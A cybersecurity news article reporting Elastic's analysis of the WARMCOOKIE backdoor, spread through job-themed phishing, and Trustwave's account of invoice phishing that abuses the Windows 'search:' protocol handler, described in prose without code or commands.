In a recent revelation, cybersecurity experts have unearthed the intricacies of an active phishing campaign that cunningly exploits job-seeking themes to infiltrate systems with a Windows-based backdoor dubbed WARMCOOKIE.
“WARMCOOKIE appears to be a preliminary reconnaissance tool employed to infiltrate victim networks and deploy further malicious payloads,” elucidated Elastic Security Labs researcher Daniel Stepanic in his latest analysis. “Each variant is imbued with a hard-coded command-and-control IP address and RC4 encryption key.”
This backdoor is armed with the ability to fingerprint compromised devices, capture screenshots, and deploy additional nefarious programs. The ongoing campaign is being tracked under the designation REF6127.
Since late April, the observed attack sequences involve deceptive email messages masquerading as recruitment communications from firms such as Hays, Michael Page, and PageGroup. These emails entice recipients to click on an embedded link to explore a purported job opportunity.
Upon clicking the link, users are directed to download a document after completing a CAPTCHA challenge. This action triggers the download of a JavaScript file (“Update_23_04_2024_5689382.js”).
“This obfuscated script executes PowerShell, initiating the process to deploy WARMCOOKIE,” stated Elastic. “The PowerShell script exploits the Background Intelligent Transfer Service (BITS) to download WARMCOOKIE.”
A critical aspect of the campaign is the utilization of compromised infrastructure to host the initial phishing URL, subsequently redirecting victims to the appropriate landing page.
As a Windows DLL, WARMCOOKIE employs a two-step process to establish persistence through a scheduled task and activate its core functions, all while performing anti-analysis checks to evade detection.
The backdoor is engineered to gather information about the infected host in a manner reminiscent of an artifact linked to a prior campaign codenamed Resident, which targeted manufacturing, commercial, and healthcare sectors.
Additionally, it supports commands to read and write files, execute commands via cmd.exe, retrieve a list of installed applications, and capture screenshots.
“WARMCOOKIE is an emerging backdoor gaining traction, used in campaigns targeting users globally,” Elastic reported.
This disclosure coincides with Trustwave SpiderLabs’ detailed account of a sophisticated phishing campaign utilizing invoice-themed decoys and exploiting Windows search functionality embedded in HTML code to deploy malware.
“The functionality offered is relatively straightforward, enabling threat actors to monitor victims and deploy more harmful payloads, such as ransomware,” the analysis noted.
The deceptive emails contain a ZIP archive with an HTML file, which leverages the legacy Windows “search:” URI protocol handler to display a Shortcut (LNK) file hosted on a remote server within Windows Explorer, creating the illusion of a local search result.
“This LNK file links to a batch script (BAT) hosted on the same server, which, when clicked by the user, could trigger additional malicious operations,” Trustwave explained, noting that the batch script could not be retrieved due to an unresponsive server.
The exploitation of search-ms: and search: as malware distribution vectors was documented by Trellix in July 2023.
“Although this attack doesn’t automate malware installation, it requires user interaction with various prompts and clicks,” the company stated. “This technique cleverly obscures the attacker’s true intentions, exploiting the trust users place in familiar interfaces and common actions like opening email attachments.”
